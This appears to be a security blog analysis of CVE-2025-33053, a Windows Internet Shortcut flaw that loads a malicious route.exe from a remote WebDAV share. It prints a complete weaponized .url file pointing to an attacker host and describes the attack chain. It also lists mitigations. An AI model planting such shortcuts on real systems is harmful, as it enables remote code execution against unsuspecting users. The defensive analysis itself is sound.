The Shortcut to Hell: Dissecting CVE-2025-33053
Jan 28, 2026·5 min read·2 visits
Executive Summary (TL;DR)
A critical RCE in Windows where a crafted .url file forces a system binary to load dependencies from an attacker-controlled WebDAV share. Actively exploited in the wild.
CVE-2025-33053 is a devastatingly simple logic flaw in how Windows handles Internet Shortcut (.url) files, allowing for Remote Code Execution via WebDAV. By manipulating the 'WorkingDirectory' property, attackers can trick legitimate system binaries into loading malicious payloads from remote servers. This vulnerability was weaponized as a zero-day by the Stealth Falcon APT group.
The Hook: The Trojan Horse in Your Downloads Folder
In the world of exploit development, complexity is often the enemy. Why spend months crafting a heap feng shui layout to bypass CFG and ASLR when you can just ask Windows to politely run your malware for you? CVE-2025-33053 is the epitome of this philosophy. It doesn't rely on memory corruption; it relies on a logic flaw so ancient it feels like a feature.
Here's the setup: You receive a ZIP file named Invoice_Q3.zip. Inside, there's a file that looks like a PDF. It has a PDF icon. But it's not a PDF. It's a Windows Internet Shortcut (.url). Most users—and frankly, many sysadmins—think of these as harmless text files that open a web browser.
But under the hood, the .url file format is a relic of the INI era, capable of instructing the Windows shell to perform complex behaviors before a browser ever opens. This vulnerability turns that innocuous shortcut into a remote bootloader for malware, bypassing Mark-of-the-Web (MOTW) protections and leveraging trusted system binaries to do the dirty work.
The Flaw: A Design Choice That Aged Like Milk
To understand this bug, you have to understand the Windows search order—specifically, how Windows finds executables when a program calls CreateProcess or ShellExecute without a full path. By default, Windows checks the Current Working Directory (CWD) before it checks the System32 folder.
The vulnerability lies in the fact that a .url file allows an attacker to define a specific WorkingDirectory for the target application. Crucially, Windows does not validate if this directory is local. It happily accepts a UNC path pointing to a remote WebDAV share (e.g., \\attacker-ip@80\share).
So, the trap is set like this:
- The attacker creates a
.urlfile that launches a legitimate Microsoft utility,iediagcmd.exe. - They set the
WorkingDirectoryto their evil WebDAV server. iediagcmd.exeis a sloppy program. During its execution, it tries to launch a helper program,route.exe, but it asks for it by name only, not by absolute path (C:\Windows\System32\route.exe).
Windows looks at the CWD (the attacker's server), sees a file named route.exe (which is actually malware), and says, "Found it!" The trusted, signed Microsoft binary then loads the malware into its own process space. This is a textbook Binary Search Order Hijacking attack, executed remotely.
The Code: Anatomy of a Murder Weapon
The "exploit code" here isn't a buffer overflow payload; it's a configuration file. The elegance is in the INI structure. Let's look at the raw bytes of a weaponized shortcut.
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.66@80\payload
IconFile=C:\Windows\System32\shell32.dll
IconIndex=13
ShowCommand=7The Breakdown:
URL: This points to the gadget binary.iediagcmd.exeis the chosen victim because it is present on almost all Windows systems and reliably calls external binaries insecurely.WorkingDirectory: The smoking gun. The@80syntax forces the Windows WebClient service to connect via WebDAV over HTTP, bypassing SMB blocking at the network perimeter.IconFile: Pure social engineering. This sets the icon to something trustworthy (like a folder or document icon) to hide the fact that it's a shortcut.
From a researcher's perspective, this is brilliant because iediagcmd.exe is whitelisted by almost every EDR on the planet. Who blocks Internet Explorer diagnostic tools?
The Exploit: From Click to Shell
Let's walk through the attack chain used by the Stealth Falcon group. It creates a perfect storm of trusted execution.
- Stage 1: The Lure. The user extracts a ZIP file containing
Urgent.pdf.url. The.urlextension might even be hidden if "Hide extensions for known file types" is enabled (which, tragically, is the default). - Stage 2: The Connection. Upon double-clicking, Windows reads the
WorkingDirectory. The WebClient service initiates an outbound connection toattacker-ipon port 80. Firewalls usually permit port 80 traffic. - Stage 3: The Bait and Switch. Windows launches
iediagcmd.exelocally. This process sets its environment's current directory to the remote share. - Stage 4: The Hook.
iediagcmd.exereaches a line of code where it needs to modify routing tables. It callsCreateProcess("route.exe", ...). - Stage 5: Execution. Windows queries the remote WebDAV share: "Do you have route.exe?" The attacker's server replies "Yes" and serves the malware.
The malicious route.exe acts as a loader. In the wild, this deployed the "Horus Agent," but it could just as easily run a Meterpreter session.
The Fix: Closing the Window(s)
Microsoft's patch for CVE-2025-33053 essentially explicitly forbids the WorkingDirectory property in .url files from referencing remote locations via UNC paths when the target is a local executable. It's a validation check added to the shell handler.
However, patching isn't instant. If you are in the trenches and can't patch immediately, you have the "Nuclear Option": Disable the WebClient Service.
> [!NOTE] > The WebClient service is what allows Windows Explorer to interact with WebDAV shares. If your organization doesn't use SharePoint mapped drives or obscure WebDAV features, kill this service. It is the bridge that allows this vulnerability to traverse the internet.
Remediation Command:
Stop-Service WebClient
Set-Service WebClient -StartupType DisabledAdditionally, update your EDR to flag iediagcmd.exe spawning any child process where the image path is not in System32. That behavior is anomalous and almost certainly malicious.
Official Patches
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:HAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
Windows 10 Microsoft | 1507 - 22H2 | June 2025 Update |
Windows 11 Microsoft | 21H2 - 24H2 | June 2025 Update |
Windows Server Microsoft | 2008 - 2025 | June 2025 Update |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-73 (External Control of File Name or Path) |
| Attack Vector | Network (WebDAV) |
| CVSS v3.1 | 8.8 (Critical) |
| EPSS Score | 25.50% (High Probability) |
| Exploit Status | Active / Weaponized |
| KEV Listed | Yes (2025-06-10) |
MITRE ATT&CK Mapping
Known Exploits & Detection
Vulnerability Timeline
Subscribe to updates
Get the latest CVE analysis reports delivered to your inbox.